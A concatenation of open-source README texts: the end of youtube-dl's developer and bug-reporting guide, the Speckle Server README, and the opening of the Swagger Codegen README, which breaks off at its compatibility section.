only allows users to extract videos from lots of websites that embed a video from another service, but may also be used to extract video from a service that it's hosting itself. Therefore, we neither recommend nor support disabling, excluding, or removing the generic extractor. If you want to find out whether a given URL is supported, simply call youtube-dl with it. If you get no videos back, chances are the URL is either not referring to a video or unsupported. You can find out which by examining the output (if you run youtube-dl on the console) or catching an `UnsupportedError` exception if you run it from a Python program. # Why do I need to go through that much red tape when filing bugs? Before we had the issue template, despite our extensive [bug reporting instructions](#bugs), about 80% of the issue reports we got were useless, for instance because people used ancient versions hundreds of releases old, because of simple syntactic errors (not in youtube-dl but in general shell usage), because the problem was already reported multiple times before, because people did not actually read an error message, even if it said "please install ffmpeg", because people did not mention the URL they were trying to download and many more simple, easy-to-avoid problems, many of whom were totally unrelated to youtube-dl. youtube-dl is an open-source project manned by too few volunteers, so we'd rather spend time fixing bugs where we are certain none of those simple problems apply, and where we can be reasonably confident to be able to reproduce the issue without asking the reporter repeatedly. As such, the output of `youtube-dl -v YOUR_URL_HERE` is really all that's required to file an issue. The issue template also guides you through some basic steps you can do, such as checking that your version of youtube-dl is current. # DEVELOPER INSTRUCTIONS Most users do not need to build youtube-dl and can [download the builds](https://ytdl-org.github.io/youtube-dl/download.html) or get them from their distribution. To run youtube-dl as a developer, you don't need to build anything either. Simply execute python -m youtube_dl To run the test, simply invoke your favorite test runner, or execute a test file directly; any of the following work: python -m unittest discover python test/test_download.py nosetests See item 6 of [new extractor tutorial](#adding-support-for-a-new-site) for how to run extractor specific test cases. If you want to create a build of youtube-dl yourself, you'll need * python * make (only GNU make is supported) * pandoc * zip * nosetests ### Adding support for a new site If you want to add support for a new site, first of all **make sure** this site is **not dedicated to [copyright infringement](README.md#can-you-add-support-for-this-anime-video-site-or-site-which-shows-current-movies-for-free)**. youtube-dl does **not support** such sites thus pull requests adding support for them **will be rejected**. After you have ensured this site is distributing its content legally, you can follow this quick list (assuming your service is called `yourextractor`): 1. [Fork this repository](https://github.com/ytdl-org/youtube-dl/fork) 2. Check out the source code with: git clone [email protected]:YOUR_GITHUB_USERNAME/youtube-dl.git 3. Start a new git branch with cd youtube-dl git checkout -b yourextractor 4. Start with this simple template and save it to `youtube_dl/extractor/yourextractor.py`: ```python # coding: utf-8 from __future__ import unicode_literals from .common import InfoExtractor class YourExtractorIE(InfoExtractor): _VALID_URL = r'https?://(?:www\.)?yourextractor\.com/watch/(?P<id>[0-9]+)' _TEST = { 'url': 'https://yourextractor.com/watch/42', 'md5': 'TODO: md5 sum of the first 10241 bytes of the video file (use --test)', 'info_dict': { 'id': '42', 'ext': 'mp4', 'title': 'Video title goes here', 'thumbnail': r're:^https?://.*\.jpg$', # TODO more properties, either as: # * A value # * MD5 checksum; start the string with md5: # * A regular expression; start the string with re: # * Any Python type (for example int or float) } } def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) # TODO more code goes here, for example ... title = self._html_search_regex(r'<h1>(.+?)</h1>', webpage, 'title') return { 'id': video_id, 'title': title, 'description': self._og_search_description(webpage), 'uploader': self._search_regex(r'<div[^>]+id="uploader"[^>]*>([^<]+)<', webpage, 'uploader', fatal=False), # TODO more properties (see youtube_dl/extractor/common.py) } ``` 5. Add an import in [`youtube_dl/extractor/extractors.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/extractor/extractors.py). 6. Run `python test/test_download.py TestDownload.test_YourExtractor`. This *should fail* at first, but you can continually re-run it until you're done. If you decide to add more than one test, then rename ``_TEST`` to ``_TESTS`` and make it into a list of dictionaries. The tests will then be named `TestDownload.test_YourExtractor`, `TestDownload.test_YourExtractor_1`, `TestDownload.test_YourExtractor_2`, etc. Note that tests with `only_matching` key in test's dict are not counted in. 7. Have a look at [`youtube_dl/extractor/common.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/extractor/common.py) for possible helper methods and a [detailed description of what your extractor should and may return](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L94-L303). Add tests and code for as many as you want. 8. Make sure your code follows [youtube-dl coding conventions](#youtube-dl-coding-conventions) and check the code with [flake8](https://flake8.pycqa.org/en/latest/index.html#quickstart): $ flake8 youtube_dl/extractor/yourextractor.py 9. Make sure your code works under all [Python](https://www.python.org/) versions claimed supported by youtube-dl, namely 2.6, 2.7, and 3.2+. 10. When the tests pass, [add](https://git-scm.com/docs/git-add) the new files and [commit](https://git-scm.com/docs/git-commit) them and [push](https://git-scm.com/docs/git-push) the result, like this: $ git add youtube_dl/extractor/extractors.py $ git add youtube_dl/extractor/yourextractor.py $ git commit -m '[yourextractor] Add new extractor' $ git push origin yourextractor 11. Finally, [create a pull request](https://help.github.com/articles/creating-a-pull-request). We'll then review and merge it. In any case, thank you very much for your contributions! ## youtube-dl coding conventions This section introduces a guide lines for writing idiomatic, robust and future-proof extractor code. Extractors are very fragile by nature since they depend on the layout of the source data provided by 3rd party media hosters out of your control and this layout tends to change. As an extractor implementer your task is not only to write code that will extract media links and metadata correctly but also to minimize dependency on the source's layout and even to make the code foresee potential future changes and be ready for that. This is important because it will allow the extractor not to break on minor layout changes thus keeping old youtube-dl versions working. Even though this breakage issue is easily fixed by emitting a new version of youtube-dl with a fix incorporated, all the previous versions become broken in all repositories and distros' packages that may not be so prompt in fetching the update from us. Needless to say, some non rolling release distros may never receive an update at all. ### Mandatory and optional metafields For extraction to work youtube-dl relies on metadata your extractor extracts and provides to youtube-dl expressed by an [information dictionary](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L94-L303) or simply *info dict*. Only the following meta fields in the *info dict* are considered mandatory for a successful extraction process by youtube-dl: - `id` (media identifier) - `title` (media title) - `url` (media download URL) or `formats` In fact only the last option is technically mandatory (i.e. if you can't figure out the download location of the media the extraction does not make any sense). But by convention youtube-dl also treats `id` and `title` as mandatory. Thus the aforementioned metafields are the critical data that the extraction does not make any sense without and if any of them fail to be extracted then the extractor is considered completely broken. [Any field](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L188-L303) apart from the aforementioned ones are considered **optional**. That means that extraction should be **tolerant** to situations when sources for these fields can potentially be unavailable (even if they are always available at the moment) and **future-proof** in order not to break the extraction of general purpose mandatory fields. #### Example Say you have some source dictionary `meta` that you've fetched as JSON with HTTP request and it has a key `summary`: ```python meta = self._download_json(url, video_id) ``` Assume at this point `meta`'s layout is: ```python { ... "summary": "some fancy summary text", ... } ``` Assume you want to extract `summary` and put it into the resulting info dict as `description`. Since `description` is an optional meta field you should be ready that this key may be missing from the `meta` dict, so that you should extract it like: ```python description = meta.get('summary') # correct ``` and not like: ```python description = meta['summary'] # incorrect ``` The latter will break extraction process with `KeyError` if `summary` disappears from `meta` at some later time but with the former approach extraction will just go ahead with `description` set to `None` which is perfectly fine (remember `None` is equivalent to the absence of data). Similarly, you should pass `fatal=False` when extracting optional data from a webpage with `_search_regex`, `_html_search_regex` or similar methods, for instance: ```python description = self._search_regex( r'<span[^>]+id="title"[^>]*>([^<]+)<', webpage, 'description', fatal=False) ``` With `fatal` set to `False` if `_search_regex` fails to extract `description` it will emit a warning and continue extraction. You can also pass `default=<some fallback value>`, for example: ```python description = self._search_regex( r'<span[^>]+id="title"[^>]*>([^<]+)<', webpage, 'description', default=None) ``` On failure this code will silently continue the extraction with `description` set to `None`. That is useful for metafields that may or may not be present. ### Provide fallbacks When extracting metadata try to do so from multiple sources. For example if `title` is present in several places, try extracting from at least some of them. This makes it more future-proof in case some of the sources become unavailable. #### Example Say `meta` from the previous example has a `title` and you are about to extract it. Since `title` is a mandatory meta field you should end up with something like: ```python title = meta['title'] ``` If `title` disappears from `meta` in future due to some changes on the hoster's side the extraction would fail since `title` is mandatory. That's expected. Assume that you have some another source you can extract `title` from, for example `og:title` HTML meta of a `webpage`. In this case you can provide a fallback scenario: ```python title = meta.get('title') or self._og_search_title(webpage) ``` This code will try to extract from `meta` first and if it fails it will try extracting `og:title` from a `webpage`. ### Regular expressions #### Don't capture groups you don't use Capturing group must be an indication that it's used somewhere in the code. Any group that is not used must be non capturing. ##### Example Don't capture id attribute name here since you can't use it for anything anyway. Correct: ```python r'(?:id|ID)=(?P<id>\d+)' ``` Incorrect: ```python r'(id|ID)=(?P<id>\d+)' ``` #### Make regular expressions relaxed and flexible When using regular expressions try to write them fuzzy, relaxed and flexible, skipping insignificant parts that are more likely to change, allowing both single and double quotes for quoted values and so on. ##### Example Say you need to extract `title` from the following HTML code: ```html <span style="position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;" class="title">some fancy title</span> ``` The code for that task should look similar to: ```python title = self._search_regex( r'<span[^>]+class="title"[^>]*>([^<]+)', webpage, 'title') ``` Or even better: ```python title = self._search_regex( r'<span[^>]+class=(["\'])title\1[^>]*>(?P<title>[^<]+)', webpage, 'title', group='title') ``` Note how you tolerate potential changes in the `style` attribute's value or switch from using double quotes to single for `class` attribute: The code definitely should not look like: ```python title = self._search_regex( r'<span style="position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;" class="title">(.*?)</span>', webpage, 'title', group='title') ``` ### Long lines policy There is a soft limit to keep lines of code under 80 characters long. This means it should be respected if possible and if it does not make readability and code maintenance worse. For example, you should **never** split long string literals like URLs or some other often copied entities over multiple lines to fit this limit: Correct: ```python 'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4' ``` Incorrect: ```python 'https://www.youtube.com/watch?v=FqZTN594JQw&list=' 'PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4' ``` ### Inline values Extracting variables is acceptable for reducing code duplication and improving readability of complex expressions. However, you should avoid extracting variables used only once and moving them to opposite parts of the extractor file, which makes reading the linear flow difficult. #### Example Correct: ```python title = self._html_search_regex(r'<title>([^<]+)</title>', webpage, 'title') ``` Incorrect: ```python TITLE_RE = r'<title>([^<]+)</title>' # ...some lines of code... title = self._html_search_regex(TITLE_RE, webpage, 'title') ``` ### Collapse fallbacks Multiple fallback values can quickly become unwieldy. Collapse multiple fallback values into a single expression via a list of patterns. #### Example Good: ```python description = self._html_search_meta( ['og:description', 'description', 'twitter:description'], webpage, 'description', default=None) ``` Unwieldy: ```python description = ( self._og_search_description(webpage, default=None) or self._html_search_meta('description', webpage, default=None) or self._html_search_meta('twitter:description', webpage, default=None)) ``` Methods supporting list of patterns are: `_search_regex`, `_html_search_regex`, `_og_search_property`, `_html_search_meta`. ### Trailing parentheses Always move trailing parentheses after the last argument. #### Example Correct: ```python lambda x: x['ResultSet']['Result'][0]['VideoUrlSet']['VideoUrl'], list) ``` Incorrect: ```python lambda x: x['ResultSet']['Result'][0]['VideoUrlSet']['VideoUrl'], list, ) ``` ### Use convenience conversion and parsing functions Wrap all extracted numeric data into safe functions from [`youtube_dl/utils.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/utils.py): `int_or_none`, `float_or_none`. Use them for string to number conversions as well. Use `url_or_none` for safe URL processing. Use `try_get` for safe metadata extraction from parsed JSON. Use `unified_strdate` for uniform `upload_date` or any `YYYYMMDD` meta field extraction, `unified_timestamp` for uniform `timestamp` extraction, `parse_filesize` for `filesize` extraction, `parse_count` for count meta fields extraction, `parse_resolution`, `parse_duration` for `duration` extraction, `parse_age_limit` for `age_limit` extraction. Explore [`youtube_dl/utils.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/utils.py) for more useful convenience functions. #### More examples ##### Safely extract optional description from parsed JSON ```python description = try_get(response, lambda x: x['result']['video'][0]['summary'], compat_str) ``` ##### Safely extract more optional metadata ```python video = try_get(response, lambda x: x['result']['video'][0], dict) or {} description = video.get('summary') duration = float_or_none(video.get('durationMs'), scale=1000) view_count = int_or_none(video.get('views')) ``` # EMBEDDING YOUTUBE-DL youtube-dl makes the best effort to be a good command-line program, and thus should be callable from any programming language. If you encounter any problems parsing its output, feel free to [create a report](https://github.com/ytdl-org/youtube-dl/issues/new). From a Python program, you can embed youtube-dl in a more powerful fashion, like this: ```python from __future__ import unicode_literals import youtube_dl ydl_opts = {} with youtube_dl.YoutubeDL(ydl_opts) as ydl: ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc']) ``` Most likely, you'll want to use various options. For a list of options available, have a look at [`youtube_dl/YoutubeDL.py`](https://github.com/ytdl-org/youtube-dl/blob/3e4cedf9e8cd3157df2457df7274d0c842421945/youtube_dl/YoutubeDL.py#L137-L312). For a start, if you want to intercept youtube-dl's output, set a `logger` object. Here's a more complete example of a program that outputs only errors (and a short message after the download is finished), and downloads/converts the video to an mp3 file: ```python from __future__ import unicode_literals import youtube_dl class MyLogger(object): def debug(self, msg): pass def warning(self, msg): pass def error(self, msg): print(msg) def my_hook(d): if d['status'] == 'finished': print('Done downloading, now converting ...') ydl_opts = { 'format': 'bestaudio/best', 'postprocessors': [{ 'key': 'FFmpegExtractAudio', 'preferredcodec': 'mp3', 'preferredquality': '192', }], 'logger': MyLogger(), 'progress_hooks': [my_hook], } with youtube_dl.YoutubeDL(ydl_opts) as ydl: ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc']) ``` # BUGS Bugs and suggestions should be reported at: <https://github.com/ytdl-org/youtube-dl/issues>. Unless you were prompted to or there is another pertinent reason (e.g. GitHub fails to accept the bug report), please do not send bug reports via personal email. For discussions, join us in the IRC channel [#youtube-dl](irc://chat.freenode.net/#youtube-dl) on freenode ([webchat](https://webchat.freenode.net/?randomnick=1&channels=youtube-dl)). **Please include the full output of youtube-dl when run with `-v`**, i.e. **add** `-v` flag to **your command line**, copy the **whole** output and post it in the issue body wrapped in \`\`\` for better formatting. It should look similar to this: ``` $ youtube-dl -v <your command line> [debug] System config: [] [debug] User config: [] [debug] Command-line args: [u'-v', u'https://www.youtube.com/watch?v=BaW_jenozKcj'] [debug] Encodings: locale cp1251, fs mbcs, out cp866, pref cp1251 [debug] youtube-dl version 2015.12.06 [debug] Git HEAD: 135392e [debug] Python version 2.6.6 - Windows-2003Server-5.2.3790-SP2 [debug] exe versions: ffmpeg N-75573-g1d0487f, ffprobe N-75573-g1d0487f, rtmpdump 2.4 [debug] Proxy map: {} ... ``` **Do not post screenshots of verbose logs; only plain text is acceptable.** The output (including the first lines) contains important debugging information. Issues without the full output are often not reproducible and therefore do not get solved in short order, if ever. Please re-read your issue once again to avoid a couple of common mistakes (you can and should use this as a checklist): ### Is the description of the issue itself sufficient? We often get issue reports that we cannot really decipher. While in most cases we eventually get the required information after asking back multiple times, this poses an unnecessary drain on our resources. Many contributors, including myself, are also not native speakers, so we may misread some parts. So please elaborate on what feature you are requesting, or what bug you want to be fixed. Make sure that it's obvious - What the problem is - How it could be fixed - How your proposed solution would look like If your report is shorter than two lines, it is almost certainly missing some of these, which makes it hard for us to respond to it. We're often too polite to close the issue outright, but the missing info makes misinterpretation likely. As a committer myself, I often get frustrated by these issues, since the only possible way for me to move forward on them is to ask for clarification over and over. For bug reports, this means that your report should contain the *complete* output of youtube-dl when called with the `-v` flag. The error message you get for (most) bugs even says so, but you would not believe how many of our bug reports do not contain this information. If your server has multiple IPs or you suspect censorship, adding `--call-home` may be a good idea to get more diagnostics. If the error is `ERROR: Unable to extract ...` and you cannot reproduce it from multiple countries, add `--dump-pages` (warning: this will yield a rather large output, redirect it to the file `log.txt` by adding `>log.txt 2>&1` to your command-line) or upload the `.dump` files you get when you add `--write-pages` [somewhere](https://gist.github.com/). **Site support requests must contain an example URL**. An example URL is a URL you might want to download, like `https://www.youtube.com/watch?v=BaW_jenozKc`. There should be an obvious video present. Except under very special circumstances, the main page of a video service (e.g. `https://www.youtube.com/`) is *not* an example URL. ### Are you using the latest version? Before reporting any issue, type `youtube-dl -U`. This should report that you're up-to-date. About 20% of the reports we receive are already fixed, but people are using outdated versions. This goes for feature requests as well. ### Is the issue already documented? Make sure that someone has not already opened the issue you're trying to open. Search at the top of the window or browse the [GitHub Issues](https://github.com/ytdl-org/youtube-dl/search?type=Issues) of this repository. If there is an issue, feel free to write something along the lines of "This affects me as well, with version 2015.01.01. Here is some more information on the issue: ...". While some issues may be old, a new post into them often spurs rapid activity. ### Why are existing options not enough? Before requesting a new feature, please have a quick peek at [the list of supported options](https://github.com/ytdl-org/youtube-dl/blob/master/README.md#options). Many feature requests are for features that actually exist already! Please, absolutely do show off your work in the issue report and detail how the existing similar options do *not* solve your problem. ### Is there enough context in your bug report? People want to solve problems, and often think they do us a favor by breaking down their larger problems (e.g. wanting to skip already downloaded files) to a specific request (e.g. requesting us to look whether the file exists before downloading the info page). However, what often happens is that they break down the problem into two steps: One simple, and one impossible (or extremely complicated one). We are then presented with a very complicated request when the original problem could be solved far easier, e.g. by recording the downloaded video IDs in a separate file. To avoid this, you must include the greater context where it is non-obvious. In particular, every feature request that does not consist of adding support for a new site should contain a use case scenario that explains in what situation the missing feature would be useful. ### Does the issue involve one problem, and one problem only? Some of our users seem to think there is a limit of issues they can or should open. There is no limit of issues they can or should open. While it may seem appealing to be able to dump all your issues into one ticket, that means that someone who solves one of your issues cannot mark the issue as closed. Typically, reporting a bunch of issues leads to the ticket lingering since nobody wants to attack that behemoth, until someone mercifully splits the issue into multiple ones. In particular, every site support request issue should only pertain to services at one site (generally under a common domain, but always using the same backend technology). Do not request support for vimeo user videos, White house podcasts, and Google Plus pages in the same issue. Also, make sure that you don't post bug reports alongside feature requests. As a rule of thumb, a feature request does not include outputs of youtube-dl that are not immediately related to the feature at hand. Do not post reports of a network error alongside the request for a new video service. ### Is anyone going to need the feature? Only post features that you (or an incapacitated friend you can personally talk to) require. Do not post features because they seem like a good idea. If they are really useful, they will be requested by someone who requires them. ### Is your question about youtube-dl? It may sound strange, but some bug reports we receive are completely unrelated to youtube-dl and relate to a different, or even the reporter's own, application. Please make sure that you are actually using youtube-dl. If you are using a UI for youtube-dl, report the bug to the maintainer of the actual application providing the UI. On the other hand, if your UI for youtube-dl fails in some way you believe is related to youtube-dl, by all means, go ahead and report the bug. # COPYRIGHT youtube-dl is released into the public domain by the copyright holders. This README file was originally written by [Daniel Bolton](https://github.com/dbbolton) and is likewise released into the public domain.
<h1 align="center"> <img src="https://user-images.githubusercontent.com/2679513/131189167-18ea5fe1-c578-47f6-9785-3748178e4312.png" width="150px"/><br/> Speckle | Server </h1> <h3 align="center"> Server and Web packages </h3> <p align="center"><b>Speckle</b> is data infrastructure for the AEC industry.</p><br/> <p align="center"><a href="https://twitter.com/SpeckleSystems"><img src="https://img.shields.io/twitter/follow/SpeckleSystems?style=social" alt="Twitter Follow"></a> <a href="https://speckle.community"><img src="https://img.shields.io/discourse/users?server=https%3A%2F%2Fspeckle.community&amp;style=flat-square&amp;logo=discourse&amp;logoColor=white" alt="Community forum users"></a> <a href="https://speckle.systems"><img src="https://img.shields.io/badge/https://-speckle.systems-royalblue?style=flat-square" alt="website"></a> <a href="https://speckle.guide/dev/"><img src="https://img.shields.io/badge/docs-speckle.guide-orange?style=flat-square&amp;logo=read-the-docs&amp;logoColor=white" alt="docs"></a></p> <p align="center"> <a href="https://github.com/Speckle-Next/SpeckleServer/"><img src="https://circleci.com/gh/specklesystems/speckle-server.svg?style=svg&amp;circle-token=76eabd350ea243575cbb258b746ed3f471f7ac29" alt="Speckle-Next"> </a> <a href="https://codecov.io/gh/specklesystems/speckle-server"> <img src="https://codecov.io/gh/specklesystems/speckle-server/branch/master/graph/badge.svg" alt="codecov"> </a> <a href="https://results.pre-commit.ci/latest/github/specklesystems/speckle-server/main"> <img src="https://results.pre-commit.ci/badge/github/specklesystems/speckle-server/main.svg" alt="codecov"> </a> </p> # About Speckle What is Speckle? Check our [![YouTube Video Views](https://img.shields.io/youtube/views/B9humiSpHzM?label=Speckle%20in%201%20minute%20video&style=social)](https://www.youtube.com/watch?v=B9humiSpHzM) ### Features - **Object-based:** say goodbye to files! Speckle is the first object based platform for the AEC industry - **Version control:** Speckle is the Git & Hub for geometry and BIM data - **Collaboration:** share your designs collaborate with others - **3D Viewer:** see your CAD and BIM models online, share and embed them anywhere - **Interoperability:** get your CAD and BIM models into other software without exporting or importing - **Real time:** get real time updates and notifications and changes - **GraphQL API:** get what you need anywhere you want it - **Webhooks:** the base for a automation and next-gen pipelines - **Built for developers:** we are building Speckle with developers in mind and got tools for every stack - **Built for the AEC industry:** Speckle connectors are plugins for the most common software used in the industry such as Revit, Rhino, Grasshopper, AutoCAD, Civil 3D, Excel, Unreal Engine, Unity, QGIS, Blender, ArchiCAD and more! ### Try Speckle now! Give Speckle a try in no time by: - [![speckle XYZ](https://img.shields.io/badge/https://-speckle.xyz-0069ff?style=flat-square&logo=hackthebox&logoColor=white)](https://speckle.xyz) ⇒ creating an account at - [![create a droplet](https://img.shields.io/badge/Create%20a%20Droplet-0069ff?style=flat-square&logo=digitalocean&logoColor=white)](https://marketplace.digitalocean.com/apps/speckle-server?refcode=947a2b5d7dc1) ⇒ deploying an instance in 1 click ### Resources - [![Community forum users](https://img.shields.io/badge/community-forum-green?style=for-the-badge&logo=discourse&logoColor=white)](https://speckle.community) for help, feature requests or just to hang with other speckle enthusiasts, check out our community forum! - [![website](https://img.shields.io/badge/tutorials-speckle.systems-royalblue?style=for-the-badge&logo=youtube)](https://speckle.systems) our tutorials portal is full of resources to get you started using Speckle - [![docs](https://img.shields.io/badge/docs-speckle.guide-orange?style=for-the-badge&logo=read-the-docs&logoColor=white)](https://speckle.guide/dev/) reference on almost any end-user and developer functionality # Repo structure This monorepo is the home of the Speckle v2 web packages: - [`packages/server`](https://github.com/specklesystems/speckle-server/blob/main/packages/server): the Server, a nodejs app. Core external dependencies are a Redis and Postgresql db. - [`packages/frontend`](https://github.com/specklesystems/speckle-server/blob/main/packages/frontend): the Frontend, a static Vue app. - [`packages/viewer`](https://github.com/specklesystems/speckle-server/blob/main/packages/viewer): a threejs extension that allows you to display 3D data [![npm version](https://camo.githubusercontent.com/dc69232cc57b77de6554e752dd6dfc60ca0ecdfbe91bdfcbf7c7531a511ec200/68747470733a2f2f62616467652e667572792e696f2f6a732f253430737065636b6c652532467669657765722e737667)](https://www.npmjs.com/package/@speckle/viewer) - [`packages/objectloader`](https://github.com/specklesystems/speckle-server/blob/main/packages/objectloader): a small js utility class that helps you stream an object and all its sub-components from the Speckle Server API. [![npm version](https://camo.githubusercontent.com/4d4f1e38ce50aaf11b4a3ad8e01ce3eaaa561dc5fd08febbae556f52f1d41097/68747470733a2f2f62616467652e667572792e696f2f6a732f253430737065636b6c652532466f626a6563746c6f616465722e737667)](https://www.npmjs.com/package/@speckle/objectloader) - [`packages/preview-service`](https://github.com/specklesystems/speckle-server/blob/main/packages/preview-service): generates object previews for Speckle Objects headlessly. This package is meant to be called on by the server. - [`packages/webhook-service`](https://github.com/specklesystems/speckle-server/tree/main/packages/webhook-service): making external webhook calls - [`packages/fileimport-service`](https://github.com/specklesystems/speckle-server/tree/main/packages/fileimport-service): parsing and importing files ### Other repos Make sure to also check and ⭐️ these other Speckle repositories: - [`speckle-sharp`](https://github.com/specklesystems/speckle-sharp): .NET tooling, connectors and interoperability - [`specklepy`](https://github.com/specklesystems/specklepy): Python SDK 🐍 - [`speckle-excel`](https://github.com/specklesystems/speckle-excel): Excel connector - [`speckle-unity`](https://github.com/specklesystems/speckle-unity): Unity 3D connector - [`speckle-blender`](https://github.com/specklesystems/speckle-blender): Blender connector - [`speckle-unreal`](https://github.com/specklesystems/speckle-unreal): Unreal Engine Connector - [`speckle-qgis`](https://github.com/specklesystems/speckle-qgis): QGIS connectod - [`speckle-powerbi`](https://github.com/specklesystems/speckle-powerbi): PowerBi connector - and more [connectors & tooling](https://github.com/specklesystems/)! ## Developing and Debugging Have you checked our [dev docs](https://speckle.guide/dev/)? We have a detailed section on [deploying a Speckle server](https://speckle.guide/dev/server-setup.html). To get started developing locally, you can see the [Local development environment](https://speckle.guide/dev/server-local-dev.html) page. ### TL;DR; We're using yarn and its workspaces functionalities to manage the monorepo. Make sure you are using nodejs 16+. To get started, run: `$ corepack enable` `$ yarn` `$ yarn build` After this, you can use the scripts in the individual packages or run all in dev mode: `$ yarn dev` ### IDE The suggested IDE for working in this repo is VSCode, because the repo has special configs to improve the DX there (auto-format & auto-lint, recommended extensions etc.). This repository relies on [VSCode multi-root workspaces](https://code.visualstudio.com/docs/editor/multi-root-workspaces), so for the best DX and proper formatting/linting make sure you open the project using the `workspace.code-workspace` file instead of just opening the folder in VSCode. ### Contributing Please make sure you read the [contribution guidelines](https://github.com/specklesystems/speckle-server/blob/main/CONTRIBUTING.md) for an overview of the best practices we try to follow. When pushing commits to this repo, please follow the following guidelines: - Before commiting, make sure `$ yarn lint` and `$ yarn prettier:check` checks pass, othewise the pre-commit hook fails. - When ready to commit, `$ yarn cz` & follow the prompts. - Please use the name of the package as the scope of your commit. ### Security For any security vulnerabilities or concerns, please contact us directly at security[at]speckle.systems. ### License Unless otherwise described, the code in this repository is licensed under the Apache-2.0 License. Please note that some modules, extensions or code herein might be otherwise licensed. This is indicated either in the root of the containing folder under a different license file, or in the respective file's header. If you have any questions, don't hesitate to get in touch with us via [email](mailto:[email protected]).
# Swagger Code Generator [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea) [![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project) [![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen) :star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star: :notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover: :warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning: :rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket: ## Overview This is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported: - **API clients**: **ActionScript**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign), **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x), **Typescript** (Angular1.x, Angular2.x, Fetch, jQuery, Node) - **Server stubs**: **C#** (ASP.NET Core, NancyFx), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy), **PHP** (Lumen, Slim, Silex, [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra) - **API documentation generators**: **HTML**, **Confluence Wiki** - **Others**: **JMeter** Check out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project. # Table of contents - [Swagger Code Generator](#swagger-code-generator) - [Overview](#overview) - [Table of Contents](#table-of-contents) - Installation - [Compatibility](#compatibility) - [Prerequisites](#prerequisites) - [OS X Users](#os-x-users) - [Building](#building) - [Docker](#docker) - [Build and run](#build-and-run-using-docker) - [Run docker in Vagrant](#run-docker-in-vagrant) - [Public Docker image](#public-docker-image) - [Homebrew](#homebrew) - [Getting Started](#getting-started) - Generators - [To generate a sample client library](#to-generate-a-sample-client-library) - [Generating libraries from your server](#generating-libraries-from-your-server) - [Modifying the client library format](#modifying-the-client-library-format) - [Making your own codegen modules](#making-your-own-codegen-modules) - [Where is Javascript???](#where-is-javascript) - [Generating a client from local files](#generating-a-client-from-local-files) - [Customizing the generator](#customizing-the-generator) - [Validating your OpenAPI Spec](#validating-your-openapi-spec) - [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation) - [Generating static html api documentation](#generating-static-html-api-documentation) - [To build a server stub](#to-build-a-server-stub) - [To build the codegen library](#to-build-the-codegen-library) - [Workflow Integration](#workflow-integration) - [Github Integration](#github-integration) - [Online Generators](#online-generators) - [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution) - [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen) - [Swagger Codegen Core Team](#swagger-codegen-core-team) - [Swagger Codegen Evangelist](#swagger-codegen-evangelist) - [License](#license) ## Compatibility The 